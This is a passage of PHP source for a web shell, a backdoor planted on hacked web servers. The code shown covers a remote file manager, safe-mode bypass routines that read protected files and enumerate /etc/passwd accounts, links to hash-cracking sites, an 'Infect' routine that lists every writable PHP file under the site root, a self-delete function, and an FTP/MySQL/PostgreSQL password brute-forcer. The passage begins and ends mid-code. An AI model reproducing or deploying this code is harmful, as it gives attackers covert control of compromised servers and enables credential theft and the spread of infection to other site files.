\'..\')\r\n                                    continue;\r\n                                if(@is_file($_COOKIE[\'c\'].$f))\r\n                                    $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n                                elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n                                    foreach ($iterator as $key=>$value) {\r\n                                        $zip->addFile(realpath($key), $key);\r\n                                    }\r\n                                }\r\n                            }\r\n                            chdir($GLOBALS[\'cwd\']);\r\n                            $zip->close();\r\n                        }\r\n                    }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n                        $zip = new ZipArchive();\r\n                        foreach($_COOKIE[\'f\'] as $f) {\r\n                            if($zip->open($_COOKIE[\'c\'].$f)) {\r\n                                $zip->extractTo($GLOBALS[\'cwd\']);\r\n                                $zip->close();\r\n                            }\r\n                        }\r\n                    }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n                    chdir($_COOKIE[\'c\']);\r\n                    $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n                    ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n                    chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n                setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n                if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tprototype(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tprototype(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tprototype(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n    hardHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\t$dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';hardFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction cmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "cmp");\r\n\tusort($dirs, "cmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'frame\\\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr id=fak><td colspan=7>\r\n\t<input type=hidden name=ne value=\'\'>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<label><select name=\'p1\'>";\r\n\tif(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n        echo "<option value=\'paste\'>↳ Paste</option>";\r\n\techo "<option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n    if(class_exists(\'ZipArchive\'))\r\n        echo "<option value=\'zip\'>+ zip</option><option value=\'unzip\'>- zip</option>";\r\n    echo "<option value=\'tar\'>+ tar.gz</option>";\r\n    echo "</select></label>";\r\n    if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n        echo "&nbsp;file name: <input type=text name=p2 value=\'hard_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'>&nbsp;";\r\n    echo "<input type=\'submit\' value=\'submit\'></td></tr></form></table></div>";\r\n\thardFooter();\r\n}\r\nfunction actionStringTools() {\r\n\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n    if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\r\n\tif(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\r\n\tif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n\t$stringTools = array(\r\n\t\t\'Base64 encode\' => \'base64_encode\',\r\n\t\t\'Base64 decode\' => \'base64_decode\',\r\n\t\t\'Url encode\' => \'urlencode\',\r\n\t\t\'Url decode\' => \'urldecode\',\r\n\t\t\'Full urlencode\' => \'full_urlencode\',\r\n\t\t\'md5 hash\' => \'md5\',\r\n\t\t\'sha1 hash\' => \'sha1\',\r\n\t\t\'crypt\' => \'crypt\',\r\n\t\t\'CRC32\' => \'crc32\',\r\n\t\t\'ASCII to HEX\' => \'ascii2hex\',\r\n\t\t\'HEX to ASCII\' => \'hex2ascii\',\r\n\t\t\'HEX to DEC\' => \'hexdec\',\r\n\t\t\'HEX to BIN\' => \'hex2bin\',\r\n\t\t\'DEC to HEX\' => \'dechex\',\r\n\t\t\'DEC to BIN\' => \'decbin\',\r\n\t\t\'BIN to HEX\' => \'binhex\',\r\n\t\t\'BIN to DEC\' => \'bindec\',\r\n\t\t\'String to lower case\' => \'strtolower\',\r\n\t\t\'String to upper case\' => \'strtoupper\',\r\n\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\r\n\t\t\'String length\' => \'strlen\',\r\n\t);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))\r\n\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\r\n\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n\techo \'<h1>String conversions</h1><div class=content>\';\r\n\techo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><label><select name=\'selectTool\'>";\r\n\tforeach($stringTools as $k => $v)\r\n\t\techo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n\t\techo "</select></label><input type=\'submit\' value=\'submit\'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n\t}\r\n\techo"</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\r\n\t\t\t<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td></td><td><input type=\'submit\' value=\'submit\'></td></tr>\r\n\t\t\t</table></form>";\r\n\tfunction hardRecursiveGlob($path) {\r\n\t\tif(substr($path, -1) != \'/\')\r\n\t\t\t$path.=\'/\';\r\n\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n\t\tif(is_array($paths)&&@count($paths)) {\r\n\t\t\tforeach($paths as $▟) {\r\n\t\t\t\tif(@is_dir($▟)){\r\n\t\t\t\t\tif($path!=$▟)\r\n\t\t\t\t\t\thardRecursiveGlob($▟);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(empty($_POST[\'p2\']) || @strpos(file_get_contents($▟), $_POST[\'p2\'])!==false)\r\n\t\t\t\t\t\techo "<a href=\'#\' onclick=\'g(\\"FilesTools\\",null,\\"".urlencode($▟)."\\", \\"view\\",\\"\\")\'>".htmlspecialchars($▟)."</a><br>";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@$_POST[\'p3\'])\r\n\t\thardRecursiveGlob($_POST[\'c\']);\r\n\techo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method=\'post\' target=\'_blank\' name=\'hf\'>\r\n\t\t\t<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>\r\n            <input type=\'hidden\' name=\'act\' value=\'find\'/>\r\n\t\t\t<input type=\'submit\' value=\'hashcracking.ru\' onclick=\\"document.hf.action=\'https://hashcracking.ru/index.php\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'submit\' value=\'md5.rednoize.com\' onclick=\\"document.hf.action=\'https://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\"><br>\r\n            <input type=\'submit\' value=\'fakenamegenerator.com\' onclick=\\"document.hf.action=\'https://www.fakenamegenerator.com/\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'submit\' value=\'hashcrack.com\' onclick=\\"document.hf.action=\'https://www.hashcrack.com/index.php\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'submit\' value=\'toolki.com\' onclick=\\"document.hf.action=\'https://toolki.com/\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'submit\' value=\'fopo.com.ar\' onclick=\\"document.hf.action=\'https://fopo.com.ar/\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'submit\' value=\'md5decrypter.com\' onclick=\\"document.hf.action=\'https://www.md5decrypter.com/\';document.hf.submit()\\"><br>\r\n\t\t</form></div>";\r\n\thardFooter();\r\n}\r\nfunction actionSafeMode() {\r\n\t$temp=\'\';\r\n\tob_start();\r\n\tswitch($_POST[\'p1\']) {\r\n\t\tcase 1:\r\n\t\t\t$temp=@tempnam($test, \'cx\');\r\n\t\t\tif(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n\t\t\t\techo @file_get_contents($temp);\r\n\t\t\t\tunlink($temp);\r\n\t\t\t} else\r\n\t\t\t\techo \'Sorry... Can\\\'t open file\';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$files = glob($_POST[\'p2\'].\'*\');\r\n\t\t\tif( is_array($files) )\r\n\t\t\t\tforeach ($files as $filename)\r\n\t\t\t\t\techo $filename."\\n";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t$ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH);\r\n\t\t\tcurl_exec($ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore("safe_mode");\r\n\t\t\tini_restore("open_basedir");\r\n\t\t\tinclude($_POST[\'p2\']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n\t\t\t\t$uid = @posix_getpwuid($_POST[\'p2\']);\r\n\t\t\t\tif ($uid)\r\n\t\t\t\t\techo join(\':\',$uid)."\\n";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase 6:\r\n\t\t\tif(!function_exists(\'imap_open\'))break;\r\n\t\t\t$stream = imap_open($_POST[\'p2\'], "", "");\r\n\t\t\tif ($stream == FALSE)\r\n\t\t\t\tbreak;\r\n\t\t\techo imap_body($stream, 1);\r\n\t\t\timap_close($stream);\r\n\t\t\tbreak;\r\n\t}\r\n\t$temp = ob_get_clean();\r\n\thardHeader();\r\n\techo \'<h1>Safe mode bypass</h1><div class=content>\';\r\n\techo \'<span>Copy (read file)</span><form onsubmit=\\\'g(null,null,"1",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\\\'g(null,null,"2",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\\\'g(null,null,"3",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\\\'g(null,null,"4",this.param.value);return false;\\\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\\\'g(null,null,"6",this.param.value);return false;\\\'><input type=text name=param><input type=submit value="submit"></form>\';\r\n\tif($temp)\r\n\t\techo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.$temp.\'</pre>\';\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionLogout() {\r\n    setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie(\'bye!\');\r\n}\r\nfunction actionSelfRemove() {\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n    if($_POST[\'p1\'] != \'yes\')\r\n        hardHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\thardFooter();\r\n}\r\nfunction actionInfect() {\r\n\thardHeader();\r\n\techo \'<h1>Infect</h1><div class=content>\';\r\n\tif($_POST[\'p1\'] == \'infect\') {\r\n\t\t$target=$_SERVER[\'DOCUMENT_ROOT\'];\r\n\t\t\tfunction ListFiles($dir) {\r\n\t\t\t\tif($dh = opendir($dir)) {\r\n\t\t\t\t\t$files = Array();\r\n\t\t\t\t\t$inner_files = Array();\r\n\t\t\t\t\twhile($file = readdir($dh)) {\r\n\t\t\t\t\t\tif($file != "." && $file != "..") {\r\n\t\t\t\t\t\t\tif(is_dir($dir . "/" . $file)) {\r\n\t\t\t\t\t\t\t\t$inner_files = ListFiles($dir . "/" . $file);\r\n\t\t\t\t\t\t\t\tif(is_array($inner_files)) $files = array_merge($files, $inner_files); \r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tarray_push($files, $dir . "/" . $file);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\treturn $files;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tforeach (ListFiles($target) as $key=>$file){\r\n\t\t\t\t$nFile = substr($file, -4, 4);\r\n\t\t\t\tif($nFile == ".php" ){\r\n\t\t\t\t\tif(($file<>$_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\'])&&(is_writeable($file))){\r\n\t\t\t\t\t\techo "$file<br>";\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo "<font color=red size=14>$i</font>";\r\n\t\t}else{\r\n\t\t\techo "<form method=post><input type=submit value=Infect name=infet></form>";\r\n\t\t\techo \'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\\\'infect\\\')">Yes</a></div>\';\r\n\t\t}\r\n\thardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n\thardHeader();\r\n\tif( isset($_POST[\'proto\']) ) {\r\n\t\techo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\r\n\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\r\n\t\t\t\tif(!$fp) return false;\r\n\t\t\t\t$res = @ftp_login($fp, $login, $pass);\r\n\t\t\t\t@ftp_close($fp);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\r\n\t\t\t\t@mysql_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n\t\t\t\t$res = @pg_connect($str);\r\n\t\t\t\t@pg_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$success = 0;\r\n\t\t$attempts = 0;\r\n\t\t$server = explode(":", $_POST[\'server\']);\r\n\t\tif($_POST[\'type\'] == 1) {\r\n\t\t\t$temp = @file(\'/etc/passwd\');\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = explode(":", $line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@$_POST[\'reverse\']) {\r\n\t\t\t\t\t\t$tmp = "";\r\n\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\r\n\t\t\t\t\t\t\t$tmp .= $line[0][$i];\r\n\t\t\t\t\t\t++$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n\t\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif($_POST[\'type\'] == 2) {\r\n\t\t\t$temp = @file($_POST[\'dict\']);\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = trim($line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";\r\n\t}\r\n\techo \'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\r\n\t\t.\'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>\'\r\n\t\t.\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'\r\n\t\t.\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\'\r\n\t\t.\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'\r\n\t\t.\'<input type=hidden name=ne  value="">\'\r\n\t\t.\'<span>Server:port</span></td>\'\r\n\t\t.\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'\r\n\t\t.\'<tr><td><span>Brute type</span></td>\'\r\n\t\t.\'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>\'\r\n\t\t.\'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>\'\r\n\t\t.\'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>\'\r\n\t\t.\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'\r\n\t\t.\'<td><input type=text name=login value="root"></td></tr>\'\r\n\t\t.\'<tr><td><span>Dictionary</span></td>\'\r\n\t\t.\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'\r\n\t\t.\'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>\';\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction __Constructor($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, $pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n                        return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn 